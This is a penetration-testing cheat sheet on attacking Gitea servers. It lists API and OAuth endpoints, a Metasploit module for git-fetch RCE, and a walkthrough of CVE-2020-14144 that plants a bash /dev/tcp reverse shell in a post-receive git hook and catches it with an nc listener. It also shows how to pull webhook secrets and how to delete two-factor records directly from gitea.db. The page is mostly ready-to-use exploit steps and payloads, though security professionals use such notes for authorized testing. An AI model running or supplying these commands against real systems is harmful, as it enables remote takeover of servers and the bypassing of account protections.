Exploit Notes

Gitea Pentesting

Last modified: 2023-03-18

Web

Gitea is a forge software package for hosting software development version control using Git.

Common Directories

/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users

# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys

Investigation

Get Secrets in Web Hooks

In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.


Git Fetch Remote Code Execution (RCE)

Metasploit

msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run

Git Hooks Remote Code Execution (RCE)

It is CVE-2020-14144 .

1. Login

Access to the Gitea dashboard and login as the existing account.

2. Create a New Repository

3. Go to the Repository’s Settings

In the new repository we’ve created, go to Settings → Git Hooks → post-receive.

4. Update to the Reverse Shell Payload

In the post-receive edit page, inject the payload as below:

#!/bin/bash

bash -i >& /dev/tcp/10.0.0.1/4444

5. Start Listener in Terminal

To receive the outcoming connection of the git hook, start listener.

nc -lvnp 4444

6. Create the New Repository in Terminal

mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master

After pushing, git hook triggered and execute the reverse shell command.
Now we should get a shell.


Swagger API

We can access to /api/swagger to interact with Swagger API.

Get New Token & Authorize

We need a token to use Swagger API.

  1. Register a new account in Gitea top page.
  2. Go to /user/settings/applications and generate a new token.
  3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
  4. Go to /api/swagger.
  5. Click “Authorize” button. The modal window opens.
  6. Paste the token in the “Token” section.

Delete the Two-Factor

victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.